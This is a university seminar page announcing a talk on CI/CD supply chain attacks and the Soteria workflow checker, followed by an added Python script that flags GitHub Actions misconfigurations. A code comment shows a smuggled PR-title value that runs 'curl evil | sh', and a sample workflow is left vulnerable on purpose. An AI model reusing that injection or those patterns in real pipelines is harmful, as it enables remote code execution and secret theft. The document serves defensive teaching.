Seminars
Since February 2019, the Software Institute has run a seminar series. Every Thursday afternoon, a researcher from the Institute gives a short talk on a software engineering topic of their choice, such as interesting recently published papers, seminal papers in their field of research, discussions of preliminary ideas, tutorials, and small experiments.
On our YouTube playlist you can rewatch some of the previous seminars. Below you will find further details on the next seminar, on upcoming ones, and an archive of previous speakers.
Everyone is welcome to attend the seminars organized by the Software Institute.
Next Speaker: Edoardo Riggio
Modern CI/CD pipelines have become central to how we automatically build, test, and deliver software. However, this pipeline automation has also become a prime target for sophisticated supply chain attacks. The SUNBURST attack on SolarWinds demonstrates how malicious actors can abuse trusted build systems to distribute tainted updates to thousands of organizations. We will start by dissecting the anatomy of SUNBURST, showing how the Russian cyber espionage group known as Nobelium managed to execute such a large-scale attack. We will then analyze its fallout, which prompted major legislative efforts such as the US Executive Order 14028 on Improving the Nation's Cybersecurity and the EU Cyber Resilience Act. Finally, we will introduce the research we are carrying out towards evaluating and securing the software supply chain of CI/CD environments. In particular, we will present Soteria, a tool we developed to automatically detect security misconfigurations in GitHub workflow files.
Edoardo Riggio is a PhD researcher in the DESIGN research group under the supervision of Prof. Cesare Pautasso. He graduated from USI in Informatics and later in Software and Data Engineering. Edoardo's research focuses on the security of software supply chains in CI/CD environments.
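To make concrete what "security misconfigurations in GitHub workflow files" means, here is an added example of a minimal checker written for this page; it is not Soteria nor any code from the speaker's group. It operates on the dict that `yaml.safe_load()` returns for a workflow file, with a vulnerable and a hardened workflow constructed inline so it runs without PyYAML or a repository. The list of untrusted event fields and the placeholder commit SHA in the hardened workflow are the author's assumptions, not values taken from the talk.

```python
"""Static checks for common GitHub Actions workflow misconfigurations.

Added illustration, not the Soteria tool presented in the seminar. Input is the
dict yaml.safe_load() returns for a workflow file; the two workflows below are
constructed samples so the script runs offline.
"""
import re

# Event fields an outside contributor controls (assumed list, not exhaustive).
# The runner expands `${{ ... }}` before the shell sees a `run:` script, so a
# PR title such as  x"; curl evil | sh; echo "  becomes shell code.
UNTRUSTED_CONTEXTS = (
    "github.event.issue.title", "github.event.issue.body",
    "github.event.pull_request.title", "github.event.pull_request.body",
    "github.event.pull_request.head.ref", "github.event.comment.body",
    "github.event.review.body", "github.event.head_commit.message",
    "github.head_ref",
)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
EXPR_RE = re.compile(r"\$\{\{\s*(.+?)\s*\}\}")


def _triggers(workflow):
    # PyYAML (YAML 1.1) reads the bare key `on` as boolean True; accept both.
    on = workflow.get("on", workflow.get(True, {}))
    return {on} if isinstance(on, str) else set(on)


def check_workflow(workflow):
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    triggers = _triggers(workflow)
    if workflow.get("permissions") == "write-all":
        findings.append("workflow: permissions write-all grants GITHUB_TOKEN every scope")
    for job_name, job in (workflow.get("jobs") or {}).items():
        if job.get("permissions") == "write-all":
            findings.append(f"{job_name}: permissions write-all grants GITHUB_TOKEN every scope")
        for idx, step in enumerate(job.get("steps") or []):
            where = f"{job_name}/step{idx}"
            uses = step.get("uses", "")
            if uses and not uses.startswith(("./", "docker://")):
                ref = uses.rsplit("@", 1)[1] if "@" in uses else ""
                if not SHA_RE.match(ref):  # tags and branches are mutable
                    findings.append(f"{where}: '{uses}' is not pinned to a commit SHA")
                # pull_request_target runs with the base repo's secrets; checking
                # out the PR head there lets the PR's own files run with them.
                ref_with = str((step.get("with") or {}).get("ref", ""))
                if ("pull_request_target" in triggers
                        and uses.startswith("actions/checkout")
                        and "github.event.pull_request.head" in ref_with):
                    findings.append(f"{where}: pull_request_target checks out the untrusted PR head")
            for expr in EXPR_RE.findall(step.get("run", "")):
                if expr.startswith(UNTRUSTED_CONTEXTS):
                    findings.append(f"{where}: '{expr}' interpolated into run (script injection)")
    return findings


# Constructed sample: four distinct misconfigurations.
VULNERABLE = {
    "name": "ci",
    "on": {"pull_request_target": {"types": ["opened", "synchronize"]}},
    "permissions": "write-all",
    "jobs": {"build": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": "actions/checkout@v4",
         "with": {"ref": "${{ github.event.pull_request.head.sha }}"}},
        {"name": "Greet", "run": 'echo "Checking PR: ${{ github.event.pull_request.title }}"'},
        {"run": "npm ci && npm test"},
    ]}},
}

# Constructed hardened version: read-only token, SHA-pinned action, plain
# pull_request trigger, untrusted input passed through env rather than inlined.
PLACEHOLDER_SHA = "0123456789abcdef0123456789abcdef01234567"  # not a real checkout commit
HARDENED = {
    "name": "ci",
    "on": {"pull_request": {}},
    "permissions": {"contents": "read"},
    "jobs": {"build": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": f"actions/checkout@{PLACEHOLDER_SHA}"},
        {"name": "Greet",
         "env": {"PR_TITLE": "${{ github.event.pull_request.title }}"},
         "run": 'echo "Checking PR: $PR_TITLE"'},
        {"run": "npm ci && npm test"},
    ]}},
}

if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(f"{label}: {len(check_workflow(wf))} finding(s)")
        for f in check_workflow(wf):
            print("  -", f)
```

The hardened workflow shows the three usual remediations together: pin third-party actions to a full commit SHA rather than a tag, scope `permissions` to the least the job needs, and move attacker-controlled event fields into `env:` so the shell receives them as data instead of having them spliced into the script text.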
Programme
- Srdjan Krstic, 22 May 2025